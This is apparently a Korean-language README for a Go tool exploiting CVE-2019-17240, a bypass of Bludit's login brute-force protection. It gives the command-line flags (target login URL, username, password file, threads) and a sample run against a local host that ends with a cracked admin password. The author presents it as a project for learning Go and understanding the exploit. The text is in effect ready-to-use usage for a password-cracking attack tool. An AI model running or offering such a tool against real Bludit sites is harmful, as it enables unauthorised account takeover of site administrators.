
Go 기반 브루트 포스 도구로, Bludit의 무차별 대입 방어 우회(CVE-2019-17240)를 이용하여 관리자 로그인 페이지에 대한 자동 비밀번호 크래킹을 수행합니다.
이것은 이 파이썬 스크립트를 Golang으로 다시 작성한 작은 프로젝트입니다. 이 프로젝트의 목적은 Golang을 배우고 이 익스플로잇이 어떻게 동작하는지 이해하는 것이었습니다.
$ ./brutepass -sdasds
flag provided but not defined: -sdasds
Usage of ./brutepass:
-c int
Threads (default 5) (default 5)
-l string
Hostname eg... http://127.0.0.1/admin/login.php
-p string
Password file
-u string
Enter username
threads 플래그를 제외한 모든 플래그는 필수입니다.
$ ./cve-2019-17240 -p pass.txt -u admin -l "http://127.0.0.1/admin/login.php"
Total requests sent: 10
Total requests sent: 20
Total requests sent: 30
Total requests sent: 40
Total requests sent: 50
Total requests sent: 60
Total requests sent: 65
==========Password Cracked=============
Password: Password